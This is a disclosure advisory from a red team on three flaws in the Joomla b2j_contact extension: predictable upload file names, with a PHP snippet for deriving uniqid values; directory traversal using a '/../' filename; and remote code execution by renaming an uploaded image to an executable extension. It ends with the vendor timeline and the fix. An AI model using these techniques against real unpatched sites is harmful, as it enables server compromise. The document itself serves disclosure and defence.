Joomla b2j_contact multiple vulnerabilities < CVE-2017-5214, CVE-2017-5215 > ================================================================================ title: Joomla b2j_contact multiple vulnerabilities vulnerable products: b2j_contact vulnerable version: all versions < 2.1.13 fixed version: 2.1.13 impact: Critical found: 2016-12-27 by: Navixia Red Team Navixia SA https://navixia.com ================================================================================ Vendor/product description: ----------------------------- B2J Contact is one of the most popular extension of Codextrous, which is used to create Contact forms. URL: https://extensions.joomla.org/extension/b2j-contact Vulnerability overview/description: ----------------------------------- 1# Insecure files access Files uploaded as attachment to the contact form are saved on the server in a folder accessible without restriction through the web server. Furthermore, the files are renamed using a guessable pattern. 2# Directory traversal By changing the name of the file submitted through the HTTP POST command, it is possible to save the file to a different directory. 3# Remote code execution Even if the MIME type of the uploaded file is checked, it is possible to change the extension of the file written on the server and thus the way that the webserver will interpret it. It is then possible to upload an executable file (aspx) and execute command on the server Proof of concept: ----------------- 1# Insecure files access When files are uploaded through b2j_contact form, the following function is used File : helpers/b2juploader.php protected function DoUpload() { ... $file = JRequest::getVar('b2jstdupload', NULL, 'files', 'array'); ... $upload_directory = JPATH_SITE . "/components/" . $GLOBALS["com_name"] . "/uploads/"; ... $filename = JFile::makeSafe($file['name']); $filename = uniqid() . "-" . $filename; $dest = $upload_directory . $filename; We can see that the original filename is retrieved from the POST command. The function makeSafe is then used. This function strips everything except latin chars and numbers. The path is defined by JPATH_SITE . "/components/" . $GLOBALS["com_name"] . "/uploads/" which will be equal in most cases to /components/com_b2jcontact/uploads/ The final filename is made of the result of the function uniqid() concatenated with the character "-" and the original filename. uniqid() is based on the PHP function microtime and thus predictable. From a given microtime we can derive the uniqid result using the following function: $m=microtime(true); $m2=sprintf("%8x%05x\n",floor($m),($m-floor($m))*1000000); It means that if we upload a file named navixia.png, the file will be accessible at the following url: /components/com_b2jcontact/uploads/XXXXXXXXXXXXX-navixia.png where XXXXXXXXXXXXX can be guessed in a number of tries relative to the precision of the server clock. We starts at a value corresponding to the value of microtime when we uploaded the file and increment it until we reach the right one. ################################################################################ 2# Directory traversal The vulnerability described in #1 can be bypassed using directory traversal common characters. For example, if we change the filename submitted in the HTTP POST request to "/../navixia.png", the $dest value will be /components/com_b2jcontact/uploads/586cfc73826e4-/../navixia.png which will end up in /components/com_b2jcontact/uploads/navixia.png ################################################################################ 3# Remote code execution Upload of unrestricted file type On the authenticated part of the b2j contact form, file extension restriction can be bypassed by uploading a file with a valid extension (for example PNG or JPG) and then using the "rename file" function to change the extension. ################################################################################ Vendor contact timeline: ------------------------ 2017-01-03: Contacting vendor. 2017-01-04: Sending advisory and proof of concept exploit to Codextrous 2017-01-05: Vendor confirm vulnerability. 2017-01-14: Vendor release security patch 2.1.13 2017-05-08: Releasing vulnerabilities Solution: --------- Update b2j to 2.1.13 or later ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Navixia Red Team route du bois 1 1024 Ecublens Switzerland https://navixia.com